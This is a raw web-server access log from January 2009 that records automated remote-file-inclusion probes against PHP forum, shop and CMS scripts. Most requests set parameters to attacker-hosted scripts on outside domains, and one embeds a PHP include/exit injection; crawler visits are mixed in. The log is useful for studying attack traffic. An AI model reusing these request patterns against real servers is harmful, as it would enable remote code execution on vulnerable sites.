66.128.49.18 - - [12/Jan/2009:18:01:45 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.128.49.18 - - [12/Jan/2009:18:01:45 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
84.16.224.119 - - [12/Jan/2009:18:02:08 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://g2staff.com/components/com_fpslideshow/images/layout.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
84.16.224.119 - - [12/Jan/2009:18:02:09 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://g2staff.com/components/com_fpslideshow/images/layout.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
81.122.81.86 - - [12/Jan/2009:18:13:28 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
81.122.81.86 - - [12/Jan/2009:18:13:29 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
65.55.208.118 - - [12/Jan/2009:18:28:43 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [12/Jan/2009:18:28:45 -0600] "GET /?M=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.122.203.139 - - [12/Jan/2009:18:40:17 -0600] "GET /logs///vwar/backup/errors.php?error=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
67.76.163.60 - - [12/Jan/2009:18:49:13 -0600] "GET /logs/access_log.1225065600/?_zb_path=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.76.163.60 - - [12/Jan/2009:18:49:13 -0600] "GET /?_zb_path=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.76.163.60 - - [12/Jan/2009:18:49:16 -0600] "GET /logs/?_zb_path=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 200 173922 "-""Mozilla/5.0"
80.122.203.139 - - [12/Jan/2009:18:53:16 -0600] "GET /logs///vwar/backup/errors.php?error=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
80.122.203.139 - - [12/Jan/2009:18:53:18 -0600] "GET ///vwar/backup/errors.php?error=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
75.125.132.98 - - [12/Jan/2009:19:29:09 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telcel.cc/~test/id123132123141424142.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
75.125.132.98 - - [12/Jan/2009:19:29:09 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telcel.cc/~test/id123132123141424142.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
69.64.48.252 - - [12/Jan/2009:20:08:40 -0600] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://www.google.com.br/search?hl=pt-BR&q=gratis&btnG=Pesquisa+Google&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; OptusNetDSL6; .NET CLR 1.1.4322)"
195.177.193.178 - - [12/Jan/2009:20:16:02 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.177.193.178 - - [12/Jan/2009:20:16:02 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
203.143.124.44 - - [12/Jan/2009:20:24:36 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
203.143.124.44 - - [12/Jan/2009:20:24:41 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
77.222.40.141 - - [12/Jan/2009:21:32:15 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.222.40.141 - - [12/Jan/2009:21:32:15 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.222.40.141 - - [12/Jan/2009:21:34:11 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.222.40.141 - - [12/Jan/2009:21:34:11 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.221.130.2 - - [12/Jan/2009:22:23:56 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.221.130.2 - - [12/Jan/2009:22:23:56 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
65.55.230.166 - - [12/Jan/2009:22:45:02 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [12/Jan/2009:22:45:02 -0600] "GET /logs/access_log.1128988800 HTTP/1.1" 200 2271 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
74.92.70.110 - - [12/Jan/2009:23:03:10 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://crownres.com/cronica.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
65.55.208.130 - - [12/Jan/2009:23:16:55 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [12/Jan/2009:23:16:55 -0600] "GET /logs/access_log.1215820800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
70.47.58.4 - - [12/Jan/2009:23:35:21 -0600] "GET /logs//index.php?cmd&file=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
70.47.58.4 - - [12/Jan/2009:23:35:21 -0600] "GET //index.php?cmd&file=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
85.158.181.12 - - [12/Jan/2009:23:36:34 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
85.158.181.12 - - [12/Jan/2009:23:36:34 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.92.70.110 - - [12/Jan/2009:23:42:20 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://crownres.com/cronica.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.808"
74.92.70.110 - - [12/Jan/2009:23:42:30 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://crownres.com/cronica.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
93.186.176.253 - - [13/Jan/2009:00:07:46 -0600] "GET /logs////include/bbs.lib.inc.php?site_path=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
93.186.176.253 - - [13/Jan/2009:00:07:46 -0600] "GET /logs////include/bbs.lib.inc.php?site_path=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
93.186.176.253 - - [13/Jan/2009:00:07:47 -0600] "GET ////include/bbs.lib.inc.php?site_path=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
93.186.176.253 - - [13/Jan/2009:00:07:47 -0600] "GET ////include/bbs.lib.inc.php?site_path=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
205.234.186.46 - - [13/Jan/2009:00:19:04 -0600] "GET /logs//bbshop/admin/admin.php?_shop_path=http://www.geocities.com/coracore98/r0bot.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
205.234.186.46 - - [13/Jan/2009:00:19:05 -0600] "GET //bbshop/admin/admin.php?_shop_path=http://www.geocities.com/coracore98/r0bot.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
69.36.10.228 - - [13/Jan/2009:00:19:46 -0600] "GET /logs//bbshop/admin/admin.php?_shop_path=http://www.geocities.com/coracore98/r0bot.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.36.10.228 - - [13/Jan/2009:00:19:46 -0600] "GET //bbshop/admin/admin.php?_shop_path=http://www.geocities.com/coracore98/r0bot.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
67.76.163.60 - - [13/Jan/2009:00:24:14 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/perkosa.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
67.76.163.60 - - [13/Jan/2009:00:24:14 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/perkosa.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
67.76.163.60 - - [13/Jan/2009:00:24:25 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/perkosa.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
67.76.163.60 - - [13/Jan/2009:00:24:25 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/perkosa.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
209.172.41.141 - - [13/Jan/2009:00:26:00 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.172.41.141 - - [13/Jan/2009:00:26:00 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.172.41.141 - - [13/Jan/2009:00:26:01 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.76.163.60 - - [13/Jan/2009:00:27:15 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
67.76.163.60 - - [13/Jan/2009:00:27:16 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
209.172.41.141 - - [13/Jan/2009:00:43:27 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.55.208.120 - - [13/Jan/2009:01:10:35 -0600] "GET /?S=D HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [13/Jan/2009:01:17:21 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [13/Jan/2009:01:17:22 -0600] "GET /logs/access_log.1154304000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [13/Jan/2009:01:17:22 -0600] "GET /logs/access_log.1141430400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [13/Jan/2009:01:17:22 -0600] "GET /logs/access_log.1156550400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [13/Jan/2009:01:17:22 -0600] "GET /logs/access_log.1189468800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [13/Jan/2009:01:17:23 -0600] "GET /logs/access_log.1106006400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
70.87.63.234 - - [13/Jan/2009:01:21:23 -0600] "GET ///?_zb_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 3246 "-""libwww-perl/5.810"
70.87.63.234 - - [13/Jan/2009:01:21:23 -0600] "GET /logs///?_zb_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 36689 "-""libwww-perl/5.810"
65.55.208.132 - - [13/Jan/2009:01:34:00 -0600] "GET /logs/access_log.1185667200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.108.87.248 - - [13/Jan/2009:02:17:26 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.108.87.248 - - [13/Jan/2009:02:17:26 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
193.146.193.6 - - [13/Jan/2009:02:23:11 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
193.146.193.6 - - [13/Jan/2009:02:23:11 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
205.234.253.201 - - [13/Jan/2009:02:25:52 -0600] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dito.nl/php_content/shop/customer/oye.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
205.234.253.201 - - [13/Jan/2009:02:25:52 -0600] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dito.nl/php_content/shop/customer/oye.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
209.200.252.15 - - [13/Jan/2009:02:30:17 -0600] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
209.200.252.15 - - [13/Jan/2009:02:30:17 -0600] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
85.236.53.4 - - [13/Jan/2009:02:36:52 -0600] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://amadeus-umzuege.de/umzug/news_local/upload/id.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
85.236.53.4 - - [13/Jan/2009:02:36:52 -0600] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://amadeus-umzuege.de/umzug/news_local/upload/id.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
77.222.131.35 - - [13/Jan/2009:02:49:22 -0600] "GET /logs//?view=page&pagename=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 200 173927 "-""libwww-perl/5.805"
77.222.131.35 - - [13/Jan/2009:02:49:24 -0600] "GET //?view=page&pagename=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
89.108.67.196 - - [13/Jan/2009:02:50:24 -0600] "GET /logs/!scanhttp://www.geocities.com/andriawan_08/idrose.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
89.108.67.196 - - [13/Jan/2009:02:50:24 -0600] "GET /!scanhttp://www.geocities.com/andriawan_08/idrose.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
210.248.168.77 - - [13/Jan/2009:02:55:53 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.geocities.com/dzely_weks/tcl/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
210.248.168.77 - - [13/Jan/2009:02:55:53 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.geocities.com/dzely_weks/tcl/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
65.55.208.135 - - [13/Jan/2009:03:08:28 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [13/Jan/2009:03:08:31 -0600] "GET /logs/access_log.1145145600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [13/Jan/2009:03:08:32 -0600] "GET /logs/access_log.1130457600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.1.215.162 - - [13/Jan/2009:03:17:40 -0600] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.172.41.75 - - [13/Jan/2009:03:22:05 -0600] "GET ////?_zb_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 3247 "-""libwww-perl/5.79"
209.172.41.75 - - [13/Jan/2009:03:22:09 -0600] "GET /logs////?_zb_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 36689 "-""libwww-perl/5.79"
65.39.182.49 - - [13/Jan/2009:03:36:03 -0600] "GET /logs//zb41/include/write.php?dir=http://sujiantho.com/it.txt??%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
65.39.182.49 - - [13/Jan/2009:03:36:03 -0600] "GET //zb41/include/write.php?dir=http://sujiantho.com/it.txt??%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
72.82.228.83 - - [13/Jan/2009:03:36:28 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.82.228.83 - - [13/Jan/2009:03:36:28 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.55.208.135 - - [13/Jan/2009:03:44:23 -0600] "GET /logs/?D=A HTTP/1.1" 200 173922 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
203.162.139.20 - - [13/Jan/2009:03:49:15 -0600] "GET /logs//zb41/include/write.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 311 "-""libwww-perl/5.800"
203.162.139.20 - - [13/Jan/2009:03:49:15 -0600] "GET /logs//zb41/include/write.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 311 "-""libwww-perl/5.800"
203.162.139.20 - - [13/Jan/2009:03:49:16 -0600] "GET //zb41/include/write.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 306 "-""libwww-perl/5.800"
203.162.139.20 - - [13/Jan/2009:03:49:16 -0600] "GET //zb41/include/write.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 306 "-""libwww-perl/5.800"
65.55.208.130 - - [13/Jan/2009:03:55:20 -0600] "GET /logs/access_log.1218067200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.51.152.234 - - [13/Jan/2009:03:55:48 -0600] "GET /logs//zb41/include/write.php?dir=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
209.51.152.234 - - [13/Jan/2009:03:55:48 -0600] "GET //zb41/include/write.php?dir=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
209.51.152.234 - - [13/Jan/2009:03:56:22 -0600] "GET /logs//zb41/include/write.php?dir=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
209.51.152.234 - - [13/Jan/2009:03:56:22 -0600] "GET //zb41/include/write.php?dir=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
216.117.131.47 - - [13/Jan/2009:03:57:05 -0600] "GET /logs//zb41/include/write.php?dir=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
216.117.131.47 - - [13/Jan/2009:03:57:05 -0600] "GET /logs//zb41/include/write.php?dir=http://c-a-k-e-p.co.cc/adu/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
216.117.131.47 - - [13/Jan/2009:03:57:05 -0600] "GET //zb41/include/write.php?dir=http://c-a-k-e-p.co.cc/adu/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
216.117.131.47 - - [13/Jan/2009:03:57:05 -0600] "GET //zb41/include/write.php?dir=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
65.254.44.210 - - [13/Jan/2009:04:01:19 -0600] "GET /logs//zb41/include/write.php?dir=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:01:19 -0600] "GET /logs//zb41/include/write.php?dir=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:01:19 -0600] "GET //zb41/include/write.php?dir=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:01:19 -0600] "GET //zb41/include/write.php?dir=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:09:54 -0600] "GET /logs///include/bbs.lib.inc.php?site_path=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:09:54 -0600] "GET ///include/bbs.lib.inc.php?site_path=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:09:55 -0600] "GET /logs///include/bbs.lib.inc.php?site_path=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
65.254.44.210 - - [13/Jan/2009:04:09:55 -0600] "GET ///include/bbs.lib.inc.php?site_path=http://italia.allaboutjazz.com//gallery/neri/idste.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
65.254.51.178 - - [13/Jan/2009:04:13:20 -0600] "GET /logs//zb41/include/write.php?dir=http://scc.bestcominfo.com/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
65.254.51.178 - - [13/Jan/2009:04:13:20 -0600] "GET /logs//zb41/include/write.php?dir=http://scc.bestcominfo.com/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
65.254.51.178 - - [13/Jan/2009:04:13:20 -0600] "GET //zb41/include/write.php?dir=http://scc.bestcominfo.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
65.254.51.178 - - [13/Jan/2009:04:13:20 -0600] "GET //zb41/include/write.php?dir=http://scc.bestcominfo.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
200.107.138.34 - - [13/Jan/2009:04:14:10 -0600] "GET /logs//zb41/include/write.php?dir=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
200.107.138.34 - - [13/Jan/2009:04:14:10 -0600] "GET //zb41/include/write.php?dir=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
70.87.63.234 - - [13/Jan/2009:04:24:02 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
70.87.63.234 - - [13/Jan/2009:04:24:03 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
65.39.182.49 - - [13/Jan/2009:04:25:45 -0600] "GET ///include/bbs.lib.inc.php?site_path=http://sujiantho.com/it.txt??%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
65.39.182.49 - - [13/Jan/2009:04:25:45 -0600] "GET /logs///include/bbs.lib.inc.php?site_path=http://sujiantho.com/it.txt??%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
66.34.133.35 - - [13/Jan/2009:04:26:52 -0600] "GET /logs/access_log.1227830400//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
66.34.133.35 - - [13/Jan/2009:04:26:52 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
66.34.133.35 - - [13/Jan/2009:04:26:52 -0600] "GET /logs/access_log.1228608000//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
66.34.133.35 - - [13/Jan/2009:04:26:52 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
193.138.29.60 - - [13/Jan/2009:04:27:14 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
193.138.29.60 - - [13/Jan/2009:04:27:14 -0600] "GET /logs/access_log.1228608000//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
193.138.29.60 - - [13/Jan/2009:04:27:14 -0600] "GET /logs/access_log.1227830400//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
